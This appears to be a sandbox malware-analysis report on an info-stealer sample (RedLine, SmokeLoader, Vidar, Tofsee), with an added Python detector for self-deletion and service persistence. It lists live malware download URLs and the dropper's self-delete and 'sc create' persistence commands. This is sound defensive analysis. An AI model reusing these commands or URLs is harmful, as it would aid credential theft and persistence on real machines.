Windows Analysis Report T5dzWoyBkt.exe

Overview

General Information

Sample Name: T5dzWoyBkt.exe
Analysis ID: 548650
MD5: f073b540a352759bb44d7a1eb641fe61
SHA1: af036e219b6e7d6551713ad406d816d9f88b4312
SHA256: 067e76900265c87d66a44f765bb720bd310e52181badf19efd63f30210f62001
Tags: exe, RedLineStealer

Detection

Malware families: RedLine, SmokeLoader, Tofsee, Vidar
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sigma detected: Suspicious Del in CommandLine
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Connects to a URL shortener service
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • svchost.exe (PID: 6944 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • T5dzWoyBkt.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\T5dzWoyBkt.exe" MD5: F073B540A352759BB44D7A1EB641FE61)
    • T5dzWoyBkt.exe (PID: 1356 cmdline: "C:\Users\user\Desktop\T5dzWoyBkt.exe" MD5: F073B540A352759BB44D7A1EB641FE61)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • AD19.exe (PID: 5384 cmdline: C:\Users\user\AppData\Local\Temp\AD19.exe MD5: 8C23CC666860658E657DC4652A48FF91)
          • AD19.exe (PID: 2824 cmdline: C:\Users\user\AppData\Local\Temp\AD19.exe MD5: 8C23CC666860658E657DC4652A48FF91)
        • C48A.exe (PID: 6860 cmdline: C:\Users\user\AppData\Local\Temp\C48A.exe MD5: 1F935BFFF0F8128972BC69625E5B2A6C)
          • WerFault.exe (PID: 5700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • DACD.exe (PID: 4616 cmdline: C:\Users\user\AppData\Local\Temp\DACD.exe MD5: 6146E19CEFC8795E7C5743176213B2C2)
          • cmd.exe (PID: 3672 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\DACD.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • timeout.exe (PID: 4792 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • E5F9.exe (PID: 6076 cmdline: C:\Users\user\AppData\Local\Temp\E5F9.exe MD5: E97EA1C4CC3EFE421BC13D3A1FA4D0A3)
          • cmd.exe (PID: 3228 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\bebxnvfo\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4412 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\npcipivi.exe" C:\Windows\SysWOW64\bebxnvfo\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5344 cmdline: C:\Windows\SysWOW64\sc.exe" create bebxnvfo binPath= "C:\Windows\SysWOW64\bebxnvfo\npcipivi.exe /d\"C:\Users\user\AppData\Local\Temp\E5F9.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • EF80.exe (PID: 6920 cmdline: C:\Users\user\AppData\Local\Temp\EF80.exe MD5: 9D7EB9BE3B7F3A023430123BA099B0B0)
          • EF80.exe (PID: 3156 cmdline: C:\Users\user\AppData\Local\Temp\EF80.exe MD5: 9D7EB9BE3B7F3A023430123BA099B0B0)
  • svchost.exe (PID: 7048 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7124 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7152 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5684 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2992 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6324 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6488 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5380 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • eijrgvi (PID: 5344 cmdline: C:\Users\user\AppData\Roaming\eijrgvi MD5: F073B540A352759BB44D7A1EB641FE61)
    • eijrgvi (PID: 4020 cmdline: C:\Users\user\AppData\Roaming\eijrgvi MD5: F073B540A352759BB44D7A1EB641FE61)
  • svchost.exe (PID: 1068 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6128 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6372 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6860 -ip 6860 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Memory Dumps

Source | Rule | Description | Author
00000008.00000000.333308223.0000000004DE1000.00000020.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
0000000E.00000002.400946485.00000000004F0000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000028.00000000.450660970.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000028.00000000.456129483.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000028.00000000.451407347.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
(14 entries in the full report)

Unpacked PEs

Source | Rule | Description | Author
14.2.AD19.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
25.2.EF80.exe.365fb70.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
15.2.eijrgvi.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
12.2.eijrgvi.47a15a0.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
7.1.T5dzWoyBkt.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
(13 entries in the full report)

Sigma Overview

System Summary:

Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started. Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community.
Data: CommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\npcipivi.exe" C:\Windows\SysWOW64\bebxnvfo\; Image: C:\Windows\SysWOW64\cmd.exe; ProcessId: 4412; ParentImage: C:\Users\user\AppData\Local\Temp\E5F9.exe; ParentCommandLine: C:\Users\user\AppData\Local\Temp\E5F9.exe; ParentProcessId: 6076
Note: the rule fired on the cmd.exe move pattern, but the command it caught moves the dropped service binary npcipivi.exe from %TEMP% into C:\Windows\SysWOW64\bebxnvfo\, not credential files; read it together with the "New Service Creation" hit below as payload staging for persistence.

Sigma detected: Suspicious Del in CommandLine
Source: Process started. Author: frack113.
Data: CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\DACD.exe" & exit; Image: C:\Windows\SysWOW64\cmd.exe; ProcessId: 3672; ParentImage: C:\Users\user\AppData\Local\Temp\DACD.exe; ParentCommandLine: C:\Users\user\AppData\Local\Temp\DACD.exe; ParentProcessId: 4616
Note: the deleted file is the parent's own image (DACD.exe), i.e. self-deletion after a 5-second timeout. The System32 path in the command line resolves to SysWOW64\cmd.exe because the 32-bit parent is subject to WOW64 file-system redirection.

Sigma detected: New Service Creation
Source: Process started. Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community.
Data: CommandLine: C:\Windows\SysWOW64\sc.exe" create bebxnvfo binPath= "C:\Windows\SysWOW64\bebxnvfo\npcipivi.exe /d\"C:\Users\user\AppData\Local\Temp\E5F9.exe\"" type= own start= auto DisplayName= "wifi support; Image: C:\Windows\SysWOW64\sc.exe; ProcessId: 5344; ParentImage: C:\Users\user\AppData\Local\Temp\E5F9.exe; ParentCommandLine: C:\Users\user\AppData\Local\Temp\E5F9.exe; ParentProcessId: 6076
Note: an auto-start service named bebxnvfo (display name "wifi support") whose binary sits in a freshly created SysWOW64 subdirectory and which receives the original dropper path as its /d argument. The unbalanced quotes are reproduced as observed in the command line.
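The three Sigma hits above, and the same cmd.exe and sc.exe command lines in the process tree, are the process-creation events a detection pipeline should flag. The following Python is an added example written for this page, not Joe Sandbox's or any Sigma rule's code: it runs three checks (self-deletion via timeout-then-del of the parent's own image, staging a file from %TEMP% into System32/SysWOW64, and auto-start service creation by a parent living in %TEMP%) over constructed process-creation events copied from the command lines reported here, plus one made-up benign control event. The event field names, the detection names and the benign control are assumptions of the example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str          # resolved image path of the new process
    cmdline: str        # command line as logged
    parent_image: str   # image path of the parent
    pid: int
    parent_pid: int


# Constructed events copied from the command lines in this report. The last one is a
# made-up benign control: an installer under Program Files registering its own service.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              "\"C:\\Windows\\System32\\cmd.exe\" /c timeout /t 5 & del /f /q "
              "\"C:\\Users\\user\\AppData\\Local\\Temp\\DACD.exe\" & exit",
              r"C:\Users\user\AppData\Local\Temp\DACD.exe", 3672, 4616),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              "\"C:\\Windows\\SysWOW64\\cmd.exe\" /C mkdir C:\\Windows\\SysWOW64\\bebxnvfo\\",
              r"C:\Users\user\AppData\Local\Temp\E5F9.exe", 3228, 6076),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              "\"C:\\Windows\\SysWOW64\\cmd.exe\" /C move /Y "
              "\"C:\\Users\\user\\AppData\\Local\\Temp\\npcipivi.exe\" C:\\Windows\\SysWOW64\\bebxnvfo\\",
              r"C:\Users\user\AppData\Local\Temp\E5F9.exe", 4412, 6076),
    ProcEvent(r"C:\Windows\SysWOW64\sc.exe",
              "C:\\Windows\\SysWOW64\\sc.exe\" create bebxnvfo binPath= "
              "\"C:\\Windows\\SysWOW64\\bebxnvfo\\npcipivi.exe /d\\\"C:\\Users\\user\\AppData\\Local\\Temp\\E5F9.exe\\\"\" "
              "type= own start= auto DisplayName= \"wifi support",
              r"C:\Users\user\AppData\Local\Temp\E5F9.exe", 5344, 6076),
    ProcEvent(r"C:\Windows\System32\sc.exe",
              "sc.exe create VendorAgent binPath= \"C:\\Program Files\\Vendor\\agent.exe\" start= auto",
              r"C:\Program Files\Vendor\setup.exe", 100, 99),
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
SYSTEM_DIR = re.compile(r"\\Windows\\(System32|SysWOW64)\\", re.I)


def _tokens(cmdline):
    """Split on whitespace, keeping double-quoted runs together (quotes stripped)."""
    return [q or bare for q, bare in re.findall(r'"([^"]+)"|(\S+)', cmdline)]


def _arg_paths(cmdline):
    """Drive-letter paths among the arguments; argv[0] (the program itself) is skipped."""
    return [t for t in _tokens(cmdline)[1:] if re.match(r"[A-Za-z]:\\", t)]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_self_delete(ev):
    """cmd.exe that waits (timeout/ping) and then deletes its own parent's image."""
    if _basename(ev.image) != "cmd.exe":
        return False
    cl = ev.cmdline.lower()
    if not re.search(r"\bdel\b", cl) or not re.search(r"\b(timeout|ping)\b", cl):
        return False
    return ev.parent_image.lower() in (p.lower() for p in _arg_paths(ev.cmdline))


def detect_staging_to_system_dir(ev):
    """cmd.exe move/copy of a file from %TEMP% into System32 or SysWOW64."""
    if _basename(ev.image) != "cmd.exe":
        return False
    if not re.search(r"\b(move|copy|xcopy)\b", ev.cmdline, re.I):
        return False
    paths = _arg_paths(ev.cmdline)
    return any(TEMP_DIR.search(p) for p in paths) and any(SYSTEM_DIR.search(p) for p in paths)


def detect_service_persistence(ev):
    """sc create with an auto-start binPath under the Windows directory, run by a parent
    that itself lives in %TEMP% (a legitimate installer would not)."""
    if _basename(ev.image) != "sc.exe":
        return False
    cl = ev.cmdline
    if not re.search(r"\bcreate\b", cl, re.I) or not re.search(r"start=\s*auto\b", cl, re.I):
        return False
    m = re.search(r'binpath=\s*"?([^"]+)', cl, re.I)
    if not m:
        return False
    return bool(SYSTEM_DIR.search(m.group(1))) and bool(TEMP_DIR.search(ev.parent_image))


DETECTIONS = {
    "self_delete_after_install": detect_self_delete,
    "stage_payload_into_system_dir": detect_staging_to_system_dir,
    "service_persistence_from_temp": detect_service_persistence,
}


def scan(events):
    """List of (pid, detection name) for every event that trips a detection."""
    return [(ev.pid, name) for ev in events for name, fn in DETECTIONS.items() if fn(ev)]


if __name__ == "__main__":
    for pid, name in scan(SAMPLE_EVENTS):
        print(pid, name)
```

The self-deletion check keys on the parent image being the del target rather than on `del` alone, which is what separates this pattern from ordinary cleanup scripts; the service check requires both a Windows-directory binPath and a %TEMP%-resident parent, so the control event registering a Program Files binary from a Program Files installer is not reported.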

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://privacytools-foryou-777.com/downloads/toolspab2.exe | Avira URL Cloud: Label: malware
Source: http://185.7.214.171:8080/6.php | URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/8584_1641133152_551.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/game.exe | Avira URL Cloud: Label: malware
Source: http://91.243.44.130/stlr/maps.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/2184_1641247228_8717.exe | Avira URL Cloud: Label: malware
Source: http://unicupload.top/install5.exe | URL Reputation: Label: phishing
Source: http://data-host-coin-8.com/files/6155_1641424911_5543.exe | Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file
Source: T5dzWoyBkt.exe | Virustotal: Detection: 41%

Multi AV Scanner detection for domain / URL
Source: http://privacytools-foryou-777.com/downloads/toolspab2.exe | Virustotal: Detection: 11%
Source: http://data-host-coin-8.com/files/8584_1641133152_551.exe | Virustotal: Detection: 10%
Source: http://data-host-coin-8.com/game.exe | Virustotal: Detection: 7%
Source: http://91.243.44.130/stlr/maps.exe | Virustotal: Detection: 10%

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\A9A9.exe | ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\B94A.exe | Metadefender: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\B94A.exe | ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\C48A.exe | Metadefender: Detection: 25%
Source: C:\Users\user\AppData\Local\Temp\C48A.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\CD6F.exe | ReversingLabs: Detection: 46%

Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\C48A.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\npcipivi.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EF80.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CD6F.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DB1C.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A9A9.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\AD19.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B94A.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E5F9.exe | Joe Sandbox ML: detected

Source: 24.2.E5F9.exe.540e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 22.2.DACD.exe.540e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.0.T5dzWoyBkt.exe.400000.1.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
Source: 7.0.T5dzWoyBkt.exe.400000.3.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
Source: 7.0.T5dzWoyBkt.exe.400000.2.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
Source: 22.3.DACD.exe.560000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.0.T5dzWoyBkt.exe.400000.0.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
Source: 24.3.E5F9.exe.580000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 24.2.E5F9.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen

Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_00407510: CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_00407470: CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_00404830: memset,CryptStringToBinaryA,CryptStringToBinaryA
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_00407190: CryptUnprotectData
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_004077A0: lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Unpacked PE file: 22.2.DACD.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E5F9.exe | Unpacked PE file: 24.2.E5F9.exe.400000.0.unpack

Source: T5dzWoyBkt.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\C48A.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown | HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49797 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.3:49798 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.3:49807 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49810 version: TLS 1.2
                        Source: Binary string: profapi.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: OC:\bowun\yatag\54\hoyosibojekov73\feb\nafixu relusivo\t.pdbh source: AD19.exe, 0000000D.00000000.379556202.0000000000401000.00000020.00020000.sdmp, AD19.exe, 0000000D.00000002.389178268.0000000000401000.00000020.00020000.sdmp, AD19.exe, 0000000E.00000000.384645453.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: fltLib.pdbr source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: sechost.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: C:\malomazasuk.pdbh source: DACD.exe, 00000016.00000000.405871178.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: msvcr100.i386.pdbk source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: wntdll.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: !C:\kovarupat-pukuxo59\cibo-rilodiravabut\fiz52-lifasezi-kepi.pdb source: T5dzWoyBkt.exe, 00000001.00000000.282979591.0000000000427000.00000002.00020000.sdmp, T5dzWoyBkt.exe, 00000007.00000000.289865801.0000000000427000.00000002.00020000.sdmp, eijrgvi, 0000000C.00000002.399294738.0000000000427000.00000002.00020000.sdmp
                        Source: Binary string: C:\zeciboj.pdb source: E5F9.exe, 00000018.00000000.410981987.0000000000401000.00000020.00020000.sdmp, E5F9.exe, 00000018.00000002.455837196.0000000000732000.00000004.00000001.sdmp
                        Source: Binary string: C:\bowun\yatag\54\hoyosibojekov73\feb\nafixu relusivo\t.pdb source: AD19.exe, AD19.exe, 0000000D.00000000.379556202.0000000000401000.00000020.00020000.sdmp, AD19.exe, 0000000D.00000002.389178268.0000000000401000.00000020.00020000.sdmp, AD19.exe, 0000000E.00000000.384645453.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: shcore.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: powrprof.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: ?\C:\zeciboj.pdbh source: E5F9.exe, 00000018.00000000.410981987.0000000000401000.00000020.00020000.sdmp, E5F9.exe, 00000018.00000002.455837196.0000000000732000.00000004.00000001.sdmp
                        Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: fltLib.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: advapi32.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: wwin32u.pdbk source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: VC:\hatisicovapehe\p.pdb source: C48A.exe, 00000013.00000000.402719669.0000000000409000.00000020.00020000.sdmp, C48A.exe, 00000013.00000000.393789417.0000000000401000.00000020.00020000.sdmp, WerFault.exe, 00000017.00000002.450844196.00000000053D0000.00000002.00020000.sdmp
                        Source: Binary string: shell32.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: C:\hatisicovapehe\p.pdb source: C48A.exe, C48A.exe, 00000013.00000000.402719669.0000000000409000.00000020.00020000.sdmp, C48A.exe, 00000013.00000000.393789417.0000000000401000.00000020.00020000.sdmp, WerFault.exe, 00000017.00000002.450844196.00000000053D0000.00000002.00020000.sdmp
                        Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: C:\kovarupat-pukuxo59\cibo-rilodiravabut\fiz52-lifasezi-kepi.pdb source: T5dzWoyBkt.exe, 00000001.00000000.282979591.0000000000427000.00000002.00020000.sdmp, T5dzWoyBkt.exe, 00000007.00000000.289865801.0000000000427000.00000002.00020000.sdmp, eijrgvi, 0000000C.00000002.399294738.0000000000427000.00000002.00020000.sdmp
                        Source: Binary string: wuser32.pdbk source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000017.00000003.408141288.0000000004F89000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: combase.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
